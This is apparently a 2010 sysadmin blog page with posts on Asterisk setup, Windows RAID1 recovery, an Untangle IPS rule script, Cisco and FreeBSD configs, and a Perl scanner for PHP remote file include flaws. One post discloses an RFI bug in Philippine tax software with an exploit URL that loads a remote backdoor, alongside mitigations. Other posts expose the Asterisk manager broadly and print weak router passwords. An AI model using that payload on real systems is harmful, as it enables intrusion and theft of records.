Ubuntu 9.10 + Asterisk + Asterisk-GUI Installation
2/25/2010 11:22:00 AM
Software used:
- Ubuntu 9.10 Karmic
- Asterisk 1.4.30-rc2
- libpri 1.4.10.2
- dahdi drivers/tools 2.2.1
- asterisk-gui 2.0
I settled for a 1.4 asterisk instead of 1.6 because I was having issues making asterisk-gui work with asterisk.
Now for the steps:
1. Install necessary prerequisites
sudo apt-get install linux-headers-$(uname -r) build-essential autoconf automake autotools-dev bison flex libncurses5-dev libssl-dev libtool subversion svn-buildpackage libxml2-dev
and create working folder
sudo mkdir /usr/src/asterisk
sudo cd /usr/src/asterisk
2. Download necessary files
sudo wget http://downloads.asterisk.org/pub/telephony/asterisk/asterisk-1.4.30-rc2.tar.gz
sudo wget http://downloads.asterisk.org/pub/telephony/libpri/releases/libpri-1.4.10.2.tar.gz
sudo wget http://downloads.asterisk.org/pub/telephony/dahdi-linux-complete/releases/dahdi-linux-complete-2.2.1+2.2.1.tar.gz
sudo svn co http://svn.digium.com/svn/asterisk-gui/branches/2.0 asterisk-gui
3. Unpack the packages
sudo tar -xvf asterisk-1.4.30-rc2.tar.gz
sudo tar -xvf libpri-1.4.10.2.tar.gz
sudo tar -xvf dahdi-linux-complete-2.2.1+2.2.1.tar.gz
4. Install libpri
cd libpri-1.4.10.2
sudo make clean
sudo make
sudo make install
5. Install dahdi-linux
cd ..
cd dahdi-linux-complete-2.2.1+2.2.1
sudo make
sudo make install
6. Asterisk
cd ..
cd asterisk-1.4.30-rc2
sudo make clean
sudo ./configure
sudo make install
sudo make samples
sudo make config
7. Now for the web interface, Asterisk-GUI
cd ../asterisk-gui
sudo make clean
sudo ./configure
sudo make
sudo make install
8. Before you can finally use the web interface, you need to make some minor configuration.
sudo vim /etc/asterisk/http.conf
and make the following changes:
[general]
enabled=yes
enablestatic=yes
bindaddr=0.0.0.0 or your IP Server
bindport=8088
9. Add the manager account
sudo vi /etc/asterisk/manager.conf
and make the following changes
[general]
enabled = yes
webenabled = yes
port = 5038
bindaddr = 0.0.0.0 or your IP Server
at the bottom of the file, add the following config:
[admin]
secret = yourpassword
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,config
10. Open the web interface at http://192.168.0.1:8088/asterisk/static/config/index.html
Screenshots:
System Status
Add/Edit User
Windows 2003 RAID1 mini HOW TO (recovering from a failed drive) - Part 2
2/22/2010 11:12:00 AM
Recovering from a failed drive is simple. You just have to remove the mirror and add a mirror to the new drive.
Recovering from a failed secondary drive
1. In Disk Management, right click your first partition and choose Remove Mirror...
2. Do the same to other partitions.
3. Now, with the new drive in place, build the new mirror as described in the first part of this how to.
Recovering from a failed primary drive
You need to get your hands dirty a bit.
1. Open up your server's casing and remove the failed drive (primary disk)
2. Move the second drive to the first SATA/IDE port (where the primary drive was previously connected)
3. Start up the server, boot normally. Disk Management will look something like this:
Notice the Missing status on the mirror drive. We removed the mirror and moved it to become the primary drive. Thus, the missing status.
4. Right click on the first partition in Disk 0 and choose Remove Mirror...
Do the same to other partitions.
5. The following prompt may appear because the mirror drive is missing. It is safe to just click OK.
6. Disk Management should look something like this.
7. You can now proceed to Adding a mirror as described in the first part of this how to.
Windows 2003 RAID1 mini HOW TO - Part 1
2/19/2010 09:50:00 AM
This step-by-step article describes how to mirror the system and boot partition in Windows Server 2003. This scenario is based on the assumption that the system and boot files are located on disk 0 and that disk 1 is unallocated space.
First some definition:
RAID 1 mirroring is an arrangement of hard disks that creates an exact copy (or mirror) of a set of data on two or more disks. This is useful when read performance or reliability are more important than data storage capacity.
Requirements:
- At least two hard-disk drives; IDE, small computer system interface (SCSI), or mixed architecture is permissible.
- The second drive must be at least the size of the volume on which the operating system boot and system files reside to permit mirroring.
- The Windows Server 2003 system and boot files must reside on the same volume to be mirrored.
Objective:
- To add a mirror to the primary drive for redundancy so that when either of the drive fails, quick recovery can be done.
There are two parts in this process -- Converting your Disks to Dynamic Disks and Adding the Actual Mirror.
Converting to Dynamic Disks
Steps:
1. Right click on My Computer on your desktop and click Manage. Under Storage, click Disk Management.
2. Right click on Disk0 and choose Convert to Dynamic Disk...
3. Tick Disk0 and Disk1 and click OK.
4. Review the disks to be converted, click Convert to proceed.
5. The next menu is a warning that other operating systems installed on any volumes on any disks can no longer start. Make sure that you are not dual booting other operating systems. Click Yes to proceed.
6. Now for the final confirmation. Click Yes to proceed.
7. Click OK when prompted. This will restart your server.
8. At this point, new drivers where installed to support the dynamic disks. You will now be prompted to restart - AGAIN.
9. That completes the process of converting to dynamic disks. You can now proceed to adding actual mirror.
Adding the Mirror
On my primary drive, I have setup pre-setup two partitions. One for the operating system and program files and another for my data. We are going to mirror both.
1. Go to Disk Management as described in the previous process.
2. Right click on the first partition and click Add Mirror..
3. Select the second drive (Disk 1), then click Add Mirror.
4. The partition will now sync to the second drive. Notice that the mirrored partition will now be color coded. It will look something like this.
5. Repeat the same step to the second partition.
When the sync-ing process is done. You now have a RAID 1 system when means, you have 1 parity. Your data is safe even if 1 drive fails.
Part 2 of this mini HOW TO will discuss on how to recover from a failed drive.
References:
Untangle UTM IPS Update Script
2/17/2010 09:30:00 AM
This script will generate an .sql file from emergingthreats.net ready for dumping to Untangle Postgres database. Although this script may not be needed as Untangle will auto-update itself, but for those who want to be cutting-edge, this script is for you. You will have to manually update the table by:
psql -e -f newrules.sql uvm postgres
Now for the script:
#! /bin/bash
# John Homer H Alvero
# Feb 13, 2010
# Change to working directory
cd /root/emergingthreats
RULEFILE='emerging-all.rules'
LIVE="t"
LOGGING="t"
/usr/bin/wget http://www.emergingthreats.net/version.txt
if [ "$?" -ne "0" ]; then
# failed download - abort run
exit
fi
exec < version.txt
read CURRENTVERSION
echo $CURRENTVERSION
exec < oldversion.txt
read OLDVERSION
echo $OLDVERSION
if [ ${CURRENTVERSION} -eq ${OLDVERSION} ]; then
echo "same release available - checking next for updates to exceptions"
rm -f version.txt*
else
echo "new version available"
rm -f $RULEFILE
/usr/bin/wget http://www.emergingthreats.net/rules/$RULEFILE
if [ "$?" -ne "0" ]; then
echo "failed retrieve of new files - exiting"
exit 3
fi
mv version.txt oldversion.txt
rm -f version.txt*
# Process file now
echo "delete from n_ips_rule where Category = 'EmergingThreat';">newrules.sql
RACK=( )
DATA=`psql -c "SELECT settings_id from n_ips_settings;" uvm postgres`
for d in $DATA
do
if [ -z "$(echo "$d" |\
sed 's/[0-9]//g;s/[0-9]//g;s/\.//' \
)" ] ; then
RACK=`echo " $RACK $d" `
fi
done
CUSTOMSID=50000
exec <$RULEFILE
while read RULES
do
CHAR1=`echo $RULES|awk '{print substr($0,1,1)}'`
WORD1=`echo $RULES|awk '{print $1}'`
if [ "$CHAR1" = "#" ]; then
DESCRIPTION=`echo $RULES|awk '{gsub(/\047/,"");print substr($0,1,60)}'`
elif [ "$WORD1" = "alert" ]; then
RULE=`echo -e $RULES|awk '{sub(/alert /,"");gsub(/\047/,"");print}'`
SID=`echo $RULES|awk '{FS=";";;print $(NF-1)}'|awk '{sub(/sid:/,"");sub(/;/,"");print $0}'`
NAME="Name"
CATEGORY="EmergingThreat"
ALERT="f"
SETTINGSID=$CURRENTVERSION
for r in $RACK
do
echo -e "INSERT INTO n_ips_rule (rule_id, rule, sid, name, category, description, live, alert, log, settings_id)" \
" VALUES ( $CUSTOMSID, \047$RULE\047, $SID , \047$NAME\047, \047$CATEGORY\047," \
" \047$DESCRIPTION\047, \047$LIVE\047, \047$ALERT\047, \047$LOGGING\047, \047" \
"$r\047);" >>newrules.sql
CUSTOMSID=$(($CUSTOMSID+1))
done
fi
done
fi
echo "Done generating SQL"
echo "Load SQL with psql -e -f newrules.sql uvm postgres"
e-RPTS RFI Vulnerability
2/12/2010 05:21:00 PM
About E-RPTS
(from the website)
An Open Source solution for Real Property Taxation in the Philippines
Part of the eLGU-eGOV set of packages developed by NCC for Local Government Units(LGU), e.g. municipalities. Other eLGU packages are eBPLS (Business Permits & Licensing) and eTOMS (Treasury Operations Management).
eRPTS web- and GIS-ready application that maintains a database of properties and owners for LGUs that is consistent with the Provincial & National government standards. It also generates reports that allows LGUs to improve their monitoring of compliance and revenue generation.
This is a critical vulnerability since the software is being implmented on each of Philippine government's Local Government Units and could expose sensitive data such as tax records and other business related details.
The vulnerability
in the file:
/includes/web/prepend.php
line 20: require($_PHPLIB["libdir"] . "common.inc");
line 21: require($_PHPLIB["libdir"] . "constants.php");
line 22: require($_PHPLIB["libdir"] . "setup.inc");
line 23: require($_PHPLIB["libdir"] . "session.inc");
line 24: require($_PHPLIB["libdir"] . "auth.inc");
line 25: require($_PHPLIB["libdir"] . "perm.inc");
line 26: require($_PHPLIB["libdir"] . "db_mysql.inc");
line 27: require($_PHPLIB["libdir"] . "tr_rpts.inc");
line 28: require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
line 29: require($_PHPLIB["libdir"] . "page.inc");
line 30: require($_PHPLIB["libdir"] . "template.inc");
This code is vulnerable to Remote File Include vulnerability by going to
http://victim.com/nccweb/index.php?_PHPLIB[libdir]=http://path.to.phpbackdoor.txt?
For this vulnerability to work, register_globals must be set to on and allow_URL_fopen set to on.
Recommendations
You should disable allow_url_fopen in the php.ini file:
allow_url_fopen = 'off'
The setting can also be disabled in apache's httpd.conf file:
php_flag allow_url_fopen off
This is actually an old PHPLIB vulnerability found here [1]. Unfortunately, developers of E-RPTS failed to update to the latest PHPLIB version.
__________________
Bug Discovered by:
John Homer Alvero
__________________
References:
Cisco Router Provider / Subscriber Configuration
2/06/2010 09:05:00 AM
Configuration sample for Cisco networking. One end is the provider and another end is a subscriber. The provider's end is using a Cisco 2651XM while the subscriber's end is using a Cisco 805 router.
First, configuration of the provider's side:
Current configuration : 3467 bytes ! version 12.2 service timestamps debug uptime service timestamps log uptime service password-encryption ! hostname CiscoHost ! ! enable secret 5 $1$JGXe$Y2vHtRP89namalZbyeMG./ enable password 7 104D010A0618 ! username root password 7 0449030F15400D1A5A ip subnet-zero ! ! no ip domain-lookup ip name-server 8.8.8.8 ip name-server 8.8.4.4 ! ! interface FastEthernet0/0 description connected to EthernetLAN ip address x.x.x.197 255.255.255.192 duplex auto speed auto ! interface Serial0/0 no ip address encapsulation frame-relay IETF frame-relay lmi-type ansi ! interface Serial0/0.200 point-to-point description Link to upstream provider bandwidth 2048 ip address x.x.x.2 255.255.255.252 frame-relay interface-dlci 200 IETF ! interface Serial0/0.201 point-to-point description frame-relay to Site1 ip address 10.1.10.9 255.255.255.252 frame-relay interface-dlci 201 IETF ! interface Serial0/0.205 point-to-point description frame-relay to Site2 ip address 10.1.10.25 255.255.255.252 frame-relay interface-dlci 205 IETF ! interface FastEthernet0/1 no ip address shutdown ! interface Serial0/1 no ip address description This interface is for another carrier's backhaul encapsulation frame-relay IETF frame-relay lmi-type ansi ! interface Serial0/1.25 point-to-point description frame-relay link to Site3 ip address 10.1.10.13 255.255.255.252 frame-relay interface-dlci 25 IETF ! interface Serial0/1.30 point-to-point description frame-relay link to Site4 ip address 10.1.10.33 255.255.255.252 frame-relay interface-dlci 30 IETF ! ip classless ip route 0.0.0.0 0.0.0.0 202.78.109.1 ip route x.x.x.224 255.255.255.248 10.1.10.6 ip route x.x.x.232 255.255.255.248 10.1.10.10 ip route x.x.x.240 255.255.255.248 10.1.10.14 ip route x.x.x.248 255.255.255.248 10.1.10.18 ip route x.x.x.0 255.255.255.248 10.1.10.22 ip route x.x.x.8 255.255.255.248 10.1.10.30 ip route x.x.x.16 255.255.255.248 10.1.10.26 ip route x.x.x.24 255.255.255.248 10.1.10.34 no ip http server ip pim bidir-enable ! ! line con 0 exec-timeout 0 0 password 7 1511021A0725 line aux 0 line vty 0 4 exec-timeout 0 0 password 7 02050D300809 login authentication local ! ! end
Now for the subcriber's configuration:
Using 1540 out of 32762 bytes ! version 11.2 no service password-encryption service udp-small-servers service tcp-small-servers ! hostname Site1 ! enable secret 5 $1$38vT$uCzNqai0a69mBYhyadqnS/ enable password secretpassword ! ! interface Ethernet0 ip address x.x.x.17 255.255.255.248 no ip route-cache no ip mroute-cache ! interface Serial0 no ip address encapsulation frame-relay IETF frame-relay lmi-type ansi ! interface Serial0.100 point-to-point description frame-relay link to Upstream provider ip address 10.1.10.10 255.255.255.252 frame-relay interface-dlci 200 IETF ! interface Serial1 shutdown ! no ip classless ip route 0.0.0.0 0.0.0.0 10.1.10.9 ! line con 0 exec-timeout 2 0 password secretpassword login line aux 0 password secretpassword login transport input all line vty 0 4 password secretpassword login ! end
Note that your frame-relay provider will be the one to assign the DLCI. Take note of the DLCI as this is an important key in the configuration. This guide should ONLY provide as guide. Make necessary changes based on your requirements.
FreeBSD PF Script
2/05/2010 08:50:00 AM
Sample pf script for FreeBSD. This is what i used and it worked for me. WMMV
#! /bin/sh /sbin/ipfw -f flush # Block an IP address from connecting to external hosts/servers /sbin/ipfw add deny tcp from 192.168.1.57 to any # Redirect port all http traffic to a local proxy server /sbin/ipfw add fwd [ip.address.of.proxy],3128 tcp from any to any 80 # IPNAT /sbin/ipfw add divert natd all from any to any via dc0 # Some traffic shapping ipfw add pipe 2 ip from any to 192.168.1.101 ipfw pipe 2 config bw 33Kbit/s ipfw add pipe 3 ip from any to 192.168.1.102 ipfw pipe 3 config bw 512Kbit/s /sbin/ipfw add pass all from any to any
WiFiCalc
2/03/2010 04:39:00 PM
WiFi Calc is a link budget calculator. It will enable you to determine the correct antenna gain, radio power and distance for a point-to-point wireless link.
Usage is straight forward. Just input the antenna gain, radio power in dB and distance in kms. and it will compute the signal for each end of the link.
The required signal on each end of the link depends on the receive sensitivity (for a required link speed) of the radio equipment you are using. This information can be found on your radio equipment's datasheet.
RFIScan - a Remote File Include Vulnerability Scanner
2/02/2010 02:52:00 PM
I wrote a perl script to find for RFI vulnerabilities in PHP scripts. It takes a folder name as paramater. The script will scan the specified folder and its sub-folders recursively.
usage: ./scan /var/www/html/
#!/usr/bin/perl
#
# PHP RFI Vulnerability Scanner
# John Homer H Alvero
# Feb. 1, 2010
my $file = '';
my @filelist = ();
my $txt_folder = $ARGV[0] . '/';
my $check_declarations = 1;
my $found = 0;
&check_folders($txt_folder);
if ($found) {
print "RFI Vulnerability Found!\n";
} else {
print "No vulnerability found\n";
}
# SUB(s)
sub check_folders {
my($dir) = @_;
local (*FOLDER);
my @fileVars = ();
my $lineVar;
my(@subfiles, $file, $specfile);
opendir(FOLDER, $dir) or die "cannot open $dir";
print "opening folder $dir \n";
@subfiles = readdir(FOLDER);
closedir(FOLDER);
foreach $file (@subfiles) {
$specfile = $dir . $file;
if (-f $specfile && $file =~ m/\S+\.php/) {
open FILE, "<", $specfile or die $!;
my $line_ctr = 0;
print "in file $specfile\n";
while (< FILE >) {
$line_ctr++;
if ($_ =~ m/^(\s|\t)*(include|include\_once|require|require\_once)\s*\(?\s*\$\w*\s*\)?/) {
my ($line1,$line2,$line3) = $_ =~ m/^(\s|\t)*(include|include\_once|require|require\_once)\s*\(?\s*(\$\w+)\s*\)?/;
if ($check_declarations) {
if (!(chomp($line2) !~ @fileVars)) {
print "Line No: $line_ctr $_";
$found = 1;
}
} else {
print "Line No: $line_ctr $_";
$found = 1;
}
}
if ($_ =~ m/^(\s*\$\S*\s*\=\s*)/i) {
my ($lineVar) = $_ =~ m/^(\s*\$\S*)/i;
push(@fileVars,$lineVar);
}
}
close(FILE);
@fileVars = ();
} elsif (-d $specfile) {
if ($specfile !~ m/\S+\.$/) {
&check_folders($specfile . "\/");
}
}#if
}#for
}#sub
Subscribe to:
Posts (Atom)